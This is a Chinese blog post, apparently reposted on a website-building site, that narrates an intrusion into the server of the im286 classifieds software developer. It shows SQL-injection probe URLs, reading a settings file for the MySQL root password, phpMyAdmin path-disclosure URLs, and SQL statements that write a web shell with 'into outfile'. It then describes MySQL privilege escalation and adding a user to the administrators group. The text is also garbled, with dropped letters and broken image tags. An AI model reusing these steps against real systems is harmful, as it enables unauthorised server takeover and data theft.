看黑客是如何黑了落伍者的(图)

网站建设 2023-02-09 11:06www.1681989.com免费网站
前天,听说落伍分类信息程序发布了,就想前去看看,什么样子的.一看,真不愧是落伍的产品,风格依然落伍,功能还行,大体一看没什么漏洞.
看看服务器吧.pg demo.im286.返回IP 58.253.71.241打开是个"Directory Listg Denied",没意思.不喜欢.
再看看开发者的站,.php..,域名真不错,pg一下吧.返回Pgg phper.xihuidc.. [58.253.71.241],看出门道来了,CNAME啊.而且一看域名xihuidc,这个IDC有点2.CNAME的确便于管理,这样不太好.
pg的我也打开了php..的站点,哟,"Powered by ebcms",先来检测下注入吧.
http://.php../?do=dex&cid=3'
http://.php../?do=news&id=4'
这两个猪点不仅出错了,而且返回了物理地址.D:\public_html\php..\root\libraries\syslib\drivers\driver.mysql.php(这个地址很重要哦)
本来想,有猪点,射管理员密码出来,进后台不就得了吗,读出密码一看,傻眼了.crypt加密的,DZ那边的数据也读出来了.鱼也够BT的,密码暴不出来,而且只登录过一次...(这个也很重要,细节.)
因为在检测的时候发现是mysql的root,直接找工具pangol,读文件吧,怎么读文件也是很有技巧的,这里不多说,读到settg.php,终于读到root的密码了.
500)this.width=500" title="点击这里用新窗口浏览图片" />
现在就开始猜phpmyadm的路径了,这个倒是很顺利.
http://phper.xihuidc../phpmyadm/,然后就很简单了.暴路径,暴路径我给大家几个办法:
引用
phpMyAdm/libraries/select_lang.lib.php
phpMyAdm/darkblue_orange/layout.c.php
phpMyAdm/dex.php?lang[]=1
路径出来了.E:\phpMyadm\phpmyadm\libraries\select_lang.lib.php
500)this.width=500" title="点击这里用新窗口浏览图片" />
写个shell进去.
Create TABLE tmdsb(shell text NOT NULL);
Insert INTO tmdsb (shell) VALUES('test');
select shell from tmdsb to outfile 'E:\phpMyadm\phpmyadm\libraries\php.php';
Drop TABLE tmdsb;
有个小马就好办了,再传个大马进去.发现每个磁盘根目录都不能浏览,甚至跳到D:\public_html\php..\root\这里也跳不过去,只能在phpmyadm的目录溜达,这里表扬下IDC,做的不错.看看C:\Progra~1,没有SERV-U,不能用Serv-U提权了,上传一个su.php,由于MYSQL是以系统权限安装的,(在WINDOWS服务管理里面可以看到,是以服务加载的)所以,这里我考虑用MYSQL提权,如图:
(这个shell里的我给拼错了,select和cmdshell,直接导致我以为服务器.exe做了限制...其实没有...)
500)this.width=500" title="点击这里用新窗口浏览图片" />
500)this.width=500" title="点击这里用新窗口浏览图片" />
修改用户k666.的密码,并添加到管理员组,成功登陆服务器.

Copyright © 2016-2025 www.1681989.com 推火网 版权所有 Power by